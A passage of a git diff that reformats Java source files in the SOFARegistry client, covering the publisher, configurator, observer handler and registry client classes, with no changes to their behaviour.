- - // merge auth attributes with exists register attributes - Map registerAttributes = register.getAttributes(); - if (null == registerAttributes) { - registerAttributes = new HashMap(); - } - registerAttributes.putAll(authAttributes); - register.setAttributes(registerAttributes); - } + public Object getRequest() { + return request; } /** - * Setter method for property authManager. + * Setter method for property request. * - * @param authManager value to be assigned to property authManager + * @param request value to be assigned to property request */ - public void setAuthManager(AuthManager authManager) { - this.authManager = authManager; + void setRequest(Object request) { + this.request = request; } /** - * @see Object#toString() + * Getter method for property done. + * + * @return property value of done */ - @Override - public String toString() { - return "AbstractInternalRegister{" + "initialVersion=" + initialVersion + ", registered=" - + registered + ", enabled=" + enabled + ", refused=" + refused + ", pubVersion=" - + pubVersion + ", ackVersion=" + ackVersion + ", timestamp=" + timestamp - + ", registerCount=" + registerCount + ", requestId='" + requestId + '}'; + public boolean isDone() { + return done; } /** - * The type Sync task. + * Setter method for property done. + * + * @param done value to be assigned to property done */ - public static class SyncTask { - - private String requestId; - - private Object request; - - private boolean done; - - /** - * Getter method for property requestId. - * - * @return property value of requestId - */ - public String getRequestId() { - return requestId; - } - - /** - * Setter method for property requestId. - * - * @param requestId value to be assigned to property requestId - */ - void setRequestId(String requestId) { - this.requestId = requestId; - } - - /** - * Getter method for property request. - * - * @return property value of request - */ - public Object getRequest() { - return request; - } - - /** - * Setter method for property request. - * - * @param request value to be assigned to property request - */ - void setRequest(Object request) { - this.request = request; - } - - /** - * Getter method for property done. - * - * @return property value of done - */ - public boolean isDone() { - return done; - } - - /** - * Setter method for property done. - * - * @param done value to be assigned to property done - */ - public void setDone(boolean done) { - this.done = done; - } + public void setDone(boolean done) { + this.done = done; } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigData.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigData.java index 61be0795d..bcd33c648 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigData.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigData.java @@ -20,32 +20,31 @@ /** * The type Default config data. + * * @author zhuoyu.sjw * @version $Id : DefaultConfigData.java, v 0.1 2018-04-18 15:29 zhuoyu.sjw Exp $$ */ public class DefaultConfigData implements ConfigData { - private String data; + private String data; - /** - * Instantiates a new Default config data. - * - * @param data the data - */ - public DefaultConfigData(String data) { - this.data = data; - } + /** + * Instantiates a new Default config data. + * + * @param data the data + */ + public DefaultConfigData(String data) { + this.data = data; + } - /** - * @see ConfigData#getData() - */ - @Override - public String getData() { - return data; - } + /** @see ConfigData#getData() */ + @Override + public String getData() { + return data; + } - @Override - public String toString() { - return "DefaultConfigData{" + "data='" + data + '\'' + '}'; - } + @Override + public String toString() { + return "DefaultConfigData{" + "data='" + data + '\'' + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigurator.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigurator.java index 7fce34e63..40b7567ec 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigurator.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultConfigurator.java @@ -29,198 +29,196 @@ import com.alipay.sofa.registry.core.constants.EventTypeConstants; import com.alipay.sofa.registry.core.model.ConfiguratorRegister; import com.alipay.sofa.registry.core.model.DataBox; - import java.util.UUID; import java.util.concurrent.atomic.AtomicBoolean; /** * The type Default configurator. + * * @author zhuoyu.sjw * @version $Id : DefaultConfigurator.java, v 0.1 2018-04-18 14:41 zhuoyu.sjw Exp $$ */ public class DefaultConfigurator extends AbstractInternalRegister implements Configurator { - private final String REGIST_ID; - - private ConfiguratorRegistration registration; - - private ConfigDataObserver configDataObserver; + private final String REGIST_ID; - private RegistryClientConfig config; + private ConfiguratorRegistration registration; - private ConfiguratorData configuratorData; + private ConfigDataObserver configDataObserver; - private Worker worker; + private RegistryClientConfig config; - private AtomicBoolean init = new AtomicBoolean(false); - - /** - * Instantiates a new Default configurator. - * - * @param config the config - * @param worker the worker - */ - public DefaultConfigurator(ConfiguratorRegistration registration, RegistryClientConfig config, - Worker worker) { - if (null != registration) { - this.configDataObserver = registration.getConfigDataObserver(); - } - this.registration = registration; - this.config = config; - this.worker = worker; - this.REGIST_ID = UUID.randomUUID().toString(); - } - - /** - * Gets data observer. - * - * @return the data observer - */ - @Override - public ConfigDataObserver getDataObserver() { - return configDataObserver; - } + private ConfiguratorData configuratorData; - /** - * Setter method for property configDataObserver. - * - * @param configDataObserver value to be assigned to property configDataObserver - */ - @Override - public void setDataObserver(ConfigDataObserver configDataObserver) { - this.configDataObserver = configDataObserver; - } + private Worker worker; - /** - * Peek data config data. - * - * @return the config data - */ - @Override - public ConfigData peekData() { - if (!init.get()) { - throw new IllegalStateException("Config data is not ready yet."); - } - if (null != configuratorData) { - DataBox dataBox = configuratorData.getDataBox(); - if (null != dataBox) { - return new DefaultConfigData(dataBox.getData()); - } - } - return new DefaultConfigData(null); - } + private AtomicBoolean init = new AtomicBoolean(false); - /** - * Assembly object. - * - * @return the object - */ - @Override - public Object assembly() { - readLock.lock(); - ConfiguratorRegister register = new ConfiguratorRegister(); - try { - register.setInstanceId(config.getInstanceId()); - if (StringUtils.isNotEmpty(config.getZone())) { - register.setZone(config.getZone()); - } else { - register.setZone(ValueConstants.DEFAULT_ZONE); - } - if (StringUtils.isNotEmpty(registration.getAppName())) { - register.setAppName(registration.getAppName()); - } else { - register.setAppName(config.getAppName()); - } - register.setDataId(registration.getDataId()); - register.setGroup(registration.getGroup()); - register.setRegistId(REGIST_ID); - register.setVersion(this.getPubVersion().get()); - register.setTimestamp(this.getTimestamp()); - - // auth signature - setAuthSignature(register); - - if (isEnabled()) { - register.setEventType(EventTypeConstants.REGISTER); - } else { - register.setEventType(EventTypeConstants.UNREGISTER); - } - } finally { - readLock.unlock(); - } - return register; + /** + * Instantiates a new Default configurator. + * + * @param config the config + * @param worker the worker + */ + public DefaultConfigurator( + ConfiguratorRegistration registration, RegistryClientConfig config, Worker worker) { + if (null != registration) { + this.configDataObserver = registration.getConfigDataObserver(); } - - /** - * Put configurator data. - * - * @param receivedConfigData the received config data - */ - public void putConfiguratorData(ConfiguratorData receivedConfigData) { - writeLock.lock(); - try { - if (null == receivedConfigData) { - return; - } - - // default version set to zero - if (null == receivedConfigData.getVersion()) { - receivedConfigData.setVersion(0L); - } - - if (null == configuratorData - || receivedConfigData.getVersion() > configuratorData.getVersion()) { - configuratorData = receivedConfigData; - init.compareAndSet(false, true); - } - - } finally { - writeLock.unlock(); - } + this.registration = registration; + this.config = config; + this.worker = worker; + this.REGIST_ID = UUID.randomUUID().toString(); + } + + /** + * Gets data observer. + * + * @return the data observer + */ + @Override + public ConfigDataObserver getDataObserver() { + return configDataObserver; + } + + /** + * Setter method for property configDataObserver. + * + * @param configDataObserver value to be assigned to property configDataObserver + */ + @Override + public void setDataObserver(ConfigDataObserver configDataObserver) { + this.configDataObserver = configDataObserver; + } + + /** + * Peek data config data. + * + * @return the config data + */ + @Override + public ConfigData peekData() { + if (!init.get()) { + throw new IllegalStateException("Config data is not ready yet."); } - - /** - * Gets data id. - * - * @return the data id - */ - @Override - public String getDataId() { - return registration.getDataId(); + if (null != configuratorData) { + DataBox dataBox = configuratorData.getDataBox(); + if (null != dataBox) { + return new DefaultConfigData(dataBox.getData()); + } } - - /** - * Gets group. - * - * @return the group - */ - @Override - public String getGroup() { - return registration.getGroup(); + return new DefaultConfigData(null); + } + + /** + * Assembly object. + * + * @return the object + */ + @Override + public Object assembly() { + readLock.lock(); + ConfiguratorRegister register = new ConfiguratorRegister(); + try { + register.setInstanceId(config.getInstanceId()); + if (StringUtils.isNotEmpty(config.getZone())) { + register.setZone(config.getZone()); + } else { + register.setZone(ValueConstants.DEFAULT_ZONE); + } + if (StringUtils.isNotEmpty(registration.getAppName())) { + register.setAppName(registration.getAppName()); + } else { + register.setAppName(config.getAppName()); + } + register.setDataId(registration.getDataId()); + register.setGroup(registration.getGroup()); + register.setRegistId(REGIST_ID); + register.setVersion(this.getPubVersion().get()); + register.setTimestamp(this.getTimestamp()); + + // auth signature + setAuthSignature(register); + + if (isEnabled()) { + register.setEventType(EventTypeConstants.REGISTER); + } else { + register.setEventType(EventTypeConstants.UNREGISTER); + } + } finally { + readLock.unlock(); } - - /** - * Gets regist id. - * - * @return the regist id - */ - @Override - public String getRegistId() { - return REGIST_ID; + return register; + } + + /** + * Put configurator data. + * + * @param receivedConfigData the received config data + */ + public void putConfiguratorData(ConfiguratorData receivedConfigData) { + writeLock.lock(); + try { + if (null == receivedConfigData) { + return; + } + + // default version set to zero + if (null == receivedConfigData.getVersion()) { + receivedConfigData.setVersion(0L); + } + + if (null == configuratorData + || receivedConfigData.getVersion() > configuratorData.getVersion()) { + configuratorData = receivedConfigData; + init.compareAndSet(false, true); + } + + } finally { + writeLock.unlock(); } - - /** - * Unregister. - */ - @Override - public void unregister() { - if (isEnabled()) { - super.unregister(); - this.worker.schedule(new TaskEvent(this)); - } + } + + /** + * Gets data id. + * + * @return the data id + */ + @Override + public String getDataId() { + return registration.getDataId(); + } + + /** + * Gets group. + * + * @return the group + */ + @Override + public String getGroup() { + return registration.getGroup(); + } + + /** + * Gets regist id. + * + * @return the regist id + */ + @Override + public String getRegistId() { + return REGIST_ID; + } + + /** Unregister. */ + @Override + public void unregister() { + if (isEnabled()) { + super.unregister(); + this.worker.schedule(new TaskEvent(this)); } + } - @Override - public String toString() { - return "DefaultConfigurator{" + "registration=" + registration + '}'; - } + @Override + public String toString() { + return "DefaultConfigurator{" + "registration=" + registration + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandler.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandler.java index 2cde5978f..abed51b2b 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandler.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultObserverHandler.java @@ -27,166 +27,160 @@ import com.alipay.sofa.registry.client.factory.NamedThreadFactory; import com.alipay.sofa.registry.client.log.LoggerFactory; import com.alipay.sofa.registry.client.task.ObserverHandler; -import org.slf4j.Logger; - import java.util.concurrent.ExecutorService; import java.util.concurrent.LinkedBlockingDeque; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; +import org.slf4j.Logger; /** * The type Default observer handler. + * * @author zhuoyu.sjw * @version $Id : DefaultObserverHandler.java, v 0.1 2018-03-15 12:02 zhuoyu.sjw Exp $$ */ public class DefaultObserverHandler implements ObserverHandler { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultObserverHandler.class); + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultObserverHandler.class); - private static final int KEEP_ALIVE_TIME = 60; + private static final int KEEP_ALIVE_TIME = 60; - private ExecutorService executor; + private ExecutorService executor; - private EventBus eventBus; + private EventBus eventBus; - private RegistryClientConfig config; + private RegistryClientConfig config; - /** - * Constructor. - * - * @param config the config - */ - public DefaultObserverHandler(RegistryClientConfig config, EventBus eventBus) { - this.config = config; - this.executor = new ThreadPoolExecutor(config.getObserverThreadCoreSize(), - config.getObserverThreadMaxSize(), KEEP_ALIVE_TIME, TimeUnit.SECONDS, + /** + * Constructor. + * + * @param config the config + */ + public DefaultObserverHandler(RegistryClientConfig config, EventBus eventBus) { + this.config = config; + this.executor = + new ThreadPoolExecutor( + config.getObserverThreadCoreSize(), + config.getObserverThreadMaxSize(), + KEEP_ALIVE_TIME, + TimeUnit.SECONDS, new LinkedBlockingDeque(config.getObserverThreadQueueLength()), new NamedThreadFactory("ObserverNotifyThread")); - this.eventBus = eventBus; - } + this.eventBus = eventBus; + } - /** - * @see ObserverHandler#notify(Subscriber) - */ - @Override - public void notify(Subscriber subscriber) { - executor.submit(new SubscriberNotifyTask(subscriber)); - } + /** @see ObserverHandler#notify(Subscriber) */ + @Override + public void notify(Subscriber subscriber) { + executor.submit(new SubscriberNotifyTask(subscriber)); + } - /** - * @see ObserverHandler#notify(Configurator) - */ - @Override - public void notify(Configurator configurator) { - executor.submit(new ConfiguratorNotifyTask(configurator)); - } + /** @see ObserverHandler#notify(Configurator) */ + @Override + public void notify(Configurator configurator) { + executor.submit(new ConfiguratorNotifyTask(configurator)); + } + + /** The type Observer notify task. */ + public class SubscriberNotifyTask implements Runnable { + + private Subscriber subscriber; /** - * The type Observer notify task. + * Constructor. + * + * @param subscriber the subscriber */ - public class SubscriberNotifyTask implements Runnable { - - private Subscriber subscriber; + public SubscriberNotifyTask(Subscriber subscriber) { + this.subscriber = subscriber; + } - /** - * Constructor. - * - * @param subscriber the subscriber - */ - public SubscriberNotifyTask(Subscriber subscriber) { - this.subscriber = subscriber; + /** @see Runnable#run() */ + @Override + public void run() { + // ignore empty task + if (null == subscriber) { + return; + } + + SubscriberProcessEvent event = new SubscriberProcessEvent(); + long start = System.currentTimeMillis(); + event.setStart(start); + event.setConfig(config); + event.setSubscriber(subscriber); + try { + SubscriberDataObserver dataObserver = subscriber.getDataObserver(); + if (null != dataObserver) { + dataObserver.handleData(subscriber.getDataId(), subscriber.peekData()); } - - /** - * @see Runnable#run() - */ - @Override - public void run() { - // ignore empty task - if (null == subscriber) { - return; - } - - SubscriberProcessEvent event = new SubscriberProcessEvent(); - long start = System.currentTimeMillis(); - event.setStart(start); - event.setConfig(config); - event.setSubscriber(subscriber); - try { - SubscriberDataObserver dataObserver = subscriber.getDataObserver(); - if (null != dataObserver) { - dataObserver.handleData(subscriber.getDataId(), subscriber.peekData()); - } - LOGGER.info( - "[notify] notify subscriber success, dataId: {}, registId:{}, cost: {}ms", - subscriber.getDataId(), subscriber.getRegistId(), - (System.currentTimeMillis() - start)); - } catch (Exception e) { - LOGGER.error("[notify] SubscriberNotifyTask execute error, dataId: {}", - subscriber.getDataId(), e); - event.setThrowable(e); - } finally { - event.setEnd(System.currentTimeMillis()); - if (null != eventBus) { - eventBus.post(event); - } - } + LOGGER.info( + "[notify] notify subscriber success, dataId: {}, registId:{}, cost: {}ms", + subscriber.getDataId(), + subscriber.getRegistId(), + (System.currentTimeMillis() - start)); + } catch (Exception e) { + LOGGER.error( + "[notify] SubscriberNotifyTask execute error, dataId: {}", subscriber.getDataId(), e); + event.setThrowable(e); + } finally { + event.setEnd(System.currentTimeMillis()); + if (null != eventBus) { + eventBus.post(event); } - + } } + } + + /** The type Configurator notify task. */ + public class ConfiguratorNotifyTask implements Runnable { + + private Configurator configurator; /** - * The type Configurator notify task. + * Instantiates a new Configurator notify task. + * + * @param configurator the configurator */ - public class ConfiguratorNotifyTask implements Runnable { - - private Configurator configurator; + public ConfiguratorNotifyTask(Configurator configurator) { + this.configurator = configurator; + } - /** - * Instantiates a new Configurator notify task. - * - * @param configurator the configurator - */ - public ConfiguratorNotifyTask(Configurator configurator) { - this.configurator = configurator; + /** @see Runnable#run() */ + @Override + public void run() { + if (null == configurator) { + return; + } + + ConfiguratorProcessEvent event = new ConfiguratorProcessEvent(); + long start = System.currentTimeMillis(); + event.setStart(start); + event.setConfig(config); + event.setConfigurator(configurator); + try { + ConfigDataObserver dataObserver = configurator.getDataObserver(); + if (null != dataObserver) { + dataObserver.handleData(configurator.getDataId(), configurator.peekData()); } - /** - * @see Runnable#run() - */ - @Override - public void run() { - if (null == configurator) { - return; - } - - ConfiguratorProcessEvent event = new ConfiguratorProcessEvent(); - long start = System.currentTimeMillis(); - event.setStart(start); - event.setConfig(config); - event.setConfigurator(configurator); - try { - ConfigDataObserver dataObserver = configurator.getDataObserver(); - if (null != dataObserver) { - dataObserver.handleData(configurator.getDataId(), configurator.peekData()); - } - - LOGGER.info( - "[notify] notify configurator success, dataId: {}, registId:{}, cost: {}ms", - configurator.getDataId(), configurator.getRegistId(), - (System.currentTimeMillis() - start)); - } catch (Exception e) { - LOGGER.error("[notify] ConfiguratorNotifyTask execute error, dataId: {}", - configurator.getDataId(), e); - event.setThrowable(e); - } finally { - event.setEnd(System.currentTimeMillis()); - if (null != eventBus) { - eventBus.post(event); - } - } + LOGGER.info( + "[notify] notify configurator success, dataId: {}, registId:{}, cost: {}ms", + configurator.getDataId(), + configurator.getRegistId(), + (System.currentTimeMillis() - start)); + } catch (Exception e) { + LOGGER.error( + "[notify] ConfiguratorNotifyTask execute error, dataId: {}", + configurator.getDataId(), + e); + event.setThrowable(e); + } finally { + event.setEnd(System.currentTimeMillis()); + if (null != eventBus) { + eventBus.post(event); } + } } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultPublisher.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultPublisher.java index 14dd00884..27c732141 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultPublisher.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultPublisher.java @@ -26,7 +26,6 @@ import com.alipay.sofa.registry.core.constants.EventTypeConstants; import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.PublisherRegister; - import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; @@ -41,140 +40,130 @@ */ public class DefaultPublisher extends AbstractInternalRegister implements Publisher { - private final String REGIST_ID; - private PublisherRegistration registration; - private Worker worker; - private Collection dataList; - private RegistryClientConfig config; - - /** - * Instantiates a new Default publisher. - * - * @param registration the publisher registration - * @param worker the worker - */ - DefaultPublisher(PublisherRegistration registration, Worker worker, RegistryClientConfig config) { - this.registration = registration; - this.worker = worker; - this.config = config; - this.REGIST_ID = UUID.randomUUID().toString(); + private final String REGIST_ID; + private PublisherRegistration registration; + private Worker worker; + private Collection dataList; + private RegistryClientConfig config; + + /** + * Instantiates a new Default publisher. + * + * @param registration the publisher registration + * @param worker the worker + */ + DefaultPublisher(PublisherRegistration registration, Worker worker, RegistryClientConfig config) { + this.registration = registration; + this.worker = worker; + this.config = config; + this.REGIST_ID = UUID.randomUUID().toString(); + } + + /** @see Publisher#republish(String...) */ + @Override + public void republish(String... data) { + if (isRefused()) { + throw new IllegalStateException( + "Publisher is refused by server. Try to check your configuration."); } - /** - * @see Publisher#republish(String...) - */ - @Override - public void republish(String... data) { - if (isRefused()) { - throw new IllegalStateException( - "Publisher is refused by server. Try to check your configuration."); - } - - if (!isEnabled()) { - throw new IllegalStateException("Unregistered publisher can not be reused."); - } - - writeLock.lock(); - try { - if (null != data) { - this.dataList = Arrays.asList(data); - } - - this.getPubVersion().incrementAndGet(); - this.setTimestamp(System.currentTimeMillis()); - this.waitToSync(); - } finally { - writeLock.unlock(); - } - this.worker.schedule(new TaskEvent(this)); + if (!isEnabled()) { + throw new IllegalStateException("Unregistered publisher can not be reused."); } - /** - * Unregister. - */ - @Override - public void unregister() { - if (isEnabled()) { - super.unregister(); - this.worker.schedule(new TaskEvent(this)); - } + writeLock.lock(); + try { + if (null != data) { + this.dataList = Arrays.asList(data); + } + + this.getPubVersion().incrementAndGet(); + this.setTimestamp(System.currentTimeMillis()); + this.waitToSync(); + } finally { + writeLock.unlock(); } - - /** - * Assembly publisher register. - * - * @return the publisher register - */ - @Override - public PublisherRegister assembly() { - readLock.lock(); - PublisherRegister register; - try { - register = new PublisherRegister(); - register.setInstanceId(config.getInstanceId()); - if (StringUtils.isNotEmpty(config.getZone())) { - register.setZone(config.getZone()); - } else { - register.setZone(ValueConstants.DEFAULT_ZONE); - } - if (StringUtils.isNotEmpty(registration.getAppName())) { - register.setAppName(registration.getAppName()); - } else { - register.setAppName(config.getAppName()); - } - register.setDataId(registration.getDataId()); - register.setGroup(registration.getGroup()); - register.setRegistId(REGIST_ID); - register.setVersion(this.getPubVersion().get()); - register.setTimestamp(this.getTimestamp()); - - // auth signature - setAuthSignature(register); - - if (isEnabled()) { - register.setEventType(EventTypeConstants.REGISTER); - if (null != dataList) { - List dataBoxes = new ArrayList(); - for (String data : dataList) { - dataBoxes.add(new DataBox(data)); - } - register.setDataList(dataBoxes); - } - } else { - register.setEventType(EventTypeConstants.UNREGISTER); - } - } finally { - readLock.unlock(); - } - return register; + this.worker.schedule(new TaskEvent(this)); + } + + /** Unregister. */ + @Override + public void unregister() { + if (isEnabled()) { + super.unregister(); + this.worker.schedule(new TaskEvent(this)); } - - /** - * @see Publisher#getDataId() - */ - @Override - public String getDataId() { - return registration.getDataId(); - } - - @Override - public String getGroup() { - return registration.getGroup(); - } - - /** - * @see Publisher#getRegistId() - */ - @Override - public String getRegistId() { - return REGIST_ID; - } - - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "DefaultPublisher{" + "registration=" + registration + '}' + super.toString(); + } + + /** + * Assembly publisher register. + * + * @return the publisher register + */ + @Override + public PublisherRegister assembly() { + readLock.lock(); + PublisherRegister register; + try { + register = new PublisherRegister(); + register.setInstanceId(config.getInstanceId()); + if (StringUtils.isNotEmpty(config.getZone())) { + register.setZone(config.getZone()); + } else { + register.setZone(ValueConstants.DEFAULT_ZONE); + } + if (StringUtils.isNotEmpty(registration.getAppName())) { + register.setAppName(registration.getAppName()); + } else { + register.setAppName(config.getAppName()); + } + register.setDataId(registration.getDataId()); + register.setGroup(registration.getGroup()); + register.setRegistId(REGIST_ID); + register.setVersion(this.getPubVersion().get()); + register.setTimestamp(this.getTimestamp()); + + // auth signature + setAuthSignature(register); + + if (isEnabled()) { + register.setEventType(EventTypeConstants.REGISTER); + if (null != dataList) { + List dataBoxes = new ArrayList(); + for (String data : dataList) { + dataBoxes.add(new DataBox(data)); + } + register.setDataList(dataBoxes); + } + } else { + register.setEventType(EventTypeConstants.UNREGISTER); + } + } finally { + readLock.unlock(); } + return register; + } + + /** @see Publisher#getDataId() */ + @Override + public String getDataId() { + return registration.getDataId(); + } + + @Override + public String getGroup() { + return registration.getGroup(); + } + + /** @see Publisher#getRegistId() */ + @Override + public String getRegistId() { + return REGIST_ID; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "DefaultPublisher{" + "registration=" + registration + '}' + super.toString(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClient.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClient.java index b58568d80..a36d8ad7d 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClient.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClient.java @@ -16,6 +16,8 @@ */ package com.alipay.sofa.registry.client.provider; +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; + import com.alipay.remoting.ConnectionEventProcessor; import com.alipay.remoting.ConnectionEventType; import com.alipay.remoting.rpc.protocol.UserProcessor; @@ -52,8 +54,6 @@ import com.alipay.sofa.registry.client.util.StringUtils; import com.alipay.sofa.registry.core.model.ReceivedConfigData; import com.alipay.sofa.registry.core.model.ReceivedData; -import org.slf4j.Logger; - import java.util.ArrayList; import java.util.Collection; import java.util.HashMap; @@ -62,548 +62,557 @@ import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; import java.util.concurrent.atomic.AtomicBoolean; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import org.slf4j.Logger; /** * The type Default registry client. + * * @author zhuoyu.sjw * @version $Id : DefaultRegistryClient.java, v 0.1 2017-11-23 20:07 zhuoyu.sjw Exp $$ */ public class DefaultRegistryClient implements RegistryClient { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultRegistryClient.class); + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultRegistryClient.class); + + private RegistryClientConfig registryClientConfig; - private RegistryClientConfig registryClientConfig; + private RegisterCache registerCache; - private RegisterCache registerCache; + private ServerManager serverManager; - private ServerManager serverManager; + private WorkerThread workerThread; - private WorkerThread workerThread; + private ClientConnection client; - private ClientConnection client; + private Map, UserProcessor> userProcessorMap; - private Map, UserProcessor> userProcessorMap; + private Map connectionEventProcessorMap; - private Map connectionEventProcessorMap; + private ConcurrentMap registrationPublisherMap; - private ConcurrentMap registrationPublisherMap; + private ConcurrentMap registrationSubscriberMap; - private ConcurrentMap registrationSubscriberMap; + private ConcurrentMap registrationConfiguratorMap; - private ConcurrentMap registrationConfiguratorMap; + private ObserverHandler observerHandler; - private ObserverHandler observerHandler; + private AuthManager authManager; - private AuthManager authManager; + private EventBus eventBus; - private EventBus eventBus; + private LookoutSubscriber lookoutSubscriber; - private LookoutSubscriber lookoutSubscriber; + private AtomicBoolean init = new AtomicBoolean(false); - private AtomicBoolean init = new AtomicBoolean(false); + /** + * Instantiates a new Default registry client. + * + * @param registryClientConfig the registry client config + */ + public DefaultRegistryClient(RegistryClientConfig registryClientConfig) { + // clone config to avoid configuration changes at runtime + this.registryClientConfig = cloneConfig(registryClientConfig); + this.registerCache = new RegisterCache(); + this.registrationPublisherMap = new ConcurrentHashMap(); + this.registrationSubscriberMap = new ConcurrentHashMap(); + this.registrationConfiguratorMap = + new ConcurrentHashMap(); + } - /** - * Instantiates a new Default registry client. - * - * @param registryClientConfig the registry client config - */ - public DefaultRegistryClient(RegistryClientConfig registryClientConfig) { - // clone config to avoid configuration changes at runtime - this.registryClientConfig = cloneConfig(registryClientConfig); - this.registerCache = new RegisterCache(); - this.registrationPublisherMap = new ConcurrentHashMap(); - this.registrationSubscriberMap = new ConcurrentHashMap(); - this.registrationConfiguratorMap = new ConcurrentHashMap(); + private DefaultRegistryClientConfig cloneConfig(RegistryClientConfig registryClientConfig) { + DefaultRegistryClientConfig cloneConfig = null; + DefaultRegistryClientConfigBuilder builder = DefaultRegistryClientConfigBuilder.start(); + if (null != registryClientConfig) { + cloneConfig = + builder + .setEnv(registryClientConfig.getEnv()) + .setAppName(registryClientConfig.getAppName()) + .setInstanceId(registryClientConfig.getInstanceId()) + .setDataCenter(registryClientConfig.getDataCenter()) + .setZone(registryClientConfig.getZone()) + .setRegistryEndpoint(registryClientConfig.getRegistryEndpoint()) + .setRegistryEndpointPort(registryClientConfig.getRegistryEndpointPort()) + .setConnectTimeout(registryClientConfig.getConnectTimeout()) + .setSocketTimeout(registryClientConfig.getSocketTimeout()) + .setInvokeTimeout(registryClientConfig.getInvokeTimeout()) + .setRecheckInterval(registryClientConfig.getRecheckInterval()) + .setObserverThreadCoreSize(registryClientConfig.getObserverThreadCoreSize()) + .setObserverThreadMaxSize(registryClientConfig.getObserverThreadMaxSize()) + .setObserverThreadQueueLength(registryClientConfig.getObserverThreadQueueLength()) + .setObserverCallbackTimeout(registryClientConfig.getObserverCallbackTimeout()) + .setSyncConfigRetryInterval(registryClientConfig.getSyncConfigRetryInterval()) + .setAccessKey(registryClientConfig.getAccessKey()) + .setSecretKey(registryClientConfig.getSecretKey()) + .build(); } + return cloneConfig; + } - private DefaultRegistryClientConfig cloneConfig(RegistryClientConfig registryClientConfig) { - DefaultRegistryClientConfig cloneConfig = null; - DefaultRegistryClientConfigBuilder builder = DefaultRegistryClientConfigBuilder.start(); - if (null != registryClientConfig) { - cloneConfig = builder.setEnv(registryClientConfig.getEnv()) - .setAppName(registryClientConfig.getAppName()) - .setInstanceId(registryClientConfig.getInstanceId()) - .setDataCenter(registryClientConfig.getDataCenter()) - .setZone(registryClientConfig.getZone()) - .setRegistryEndpoint(registryClientConfig.getRegistryEndpoint()) - .setRegistryEndpointPort(registryClientConfig.getRegistryEndpointPort()) - .setConnectTimeout(registryClientConfig.getConnectTimeout()) - .setSocketTimeout(registryClientConfig.getSocketTimeout()) - .setInvokeTimeout(registryClientConfig.getInvokeTimeout()) - .setRecheckInterval(registryClientConfig.getRecheckInterval()) - .setObserverThreadCoreSize(registryClientConfig.getObserverThreadCoreSize()) - .setObserverThreadMaxSize(registryClientConfig.getObserverThreadMaxSize()) - .setObserverThreadQueueLength(registryClientConfig.getObserverThreadQueueLength()) - .setObserverCallbackTimeout(registryClientConfig.getObserverCallbackTimeout()) - .setSyncConfigRetryInterval(registryClientConfig.getSyncConfigRetryInterval()) - .setAccessKey(registryClientConfig.getAccessKey()) - .setSecretKey(registryClientConfig.getSecretKey()).build(); - } - return cloneConfig; + /** Init. */ + public void init() { + if (!init.compareAndSet(false, true)) { + return; } - /** - * Init. - */ - public void init() { - if (!init.compareAndSet(false, true)) { - return; - } + // init lookout subscriber + if (null == lookoutSubscriber) { + this.lookoutSubscriber = new LookoutSubscriber(); + } - // init lookout subscriber - if (null == lookoutSubscriber) { - this.lookoutSubscriber = new LookoutSubscriber(); - } + // init event bus + if (null == eventBus) { + this.eventBus = new DefaultEventBus(registryClientConfig); + this.eventBus.register(SubscriberProcessEvent.class, lookoutSubscriber); + this.eventBus.register(ConfiguratorProcessEvent.class, lookoutSubscriber); + } - // init event bus - if (null == eventBus) { - this.eventBus = new DefaultEventBus(registryClientConfig); - this.eventBus.register(SubscriberProcessEvent.class, lookoutSubscriber); - this.eventBus.register(ConfiguratorProcessEvent.class, lookoutSubscriber); - } + // init server manager + if (null == serverManager) { + this.serverManager = new DefaultServerManager(registryClientConfig); + } - // init server manager - if (null == serverManager) { - this.serverManager = new DefaultServerManager(registryClientConfig); - } + // init observer handler + if (null == observerHandler) { + observerHandler = new DefaultObserverHandler(registryClientConfig, eventBus); + } - // init observer handler - if (null == observerHandler) { - observerHandler = new DefaultObserverHandler(registryClientConfig, eventBus); - } + // init auth manager + if (null == authManager) { + authManager = NoopAuthManager.INSTANCE; + } - // init auth manager - if (null == authManager) { - authManager = NoopAuthManager.INSTANCE; - } + // init user processor + List userProcessorList = new ArrayList(); + if (null == userProcessorMap) { + userProcessorList.add(new ReceivedDataProcessor(registerCache, observerHandler)); + 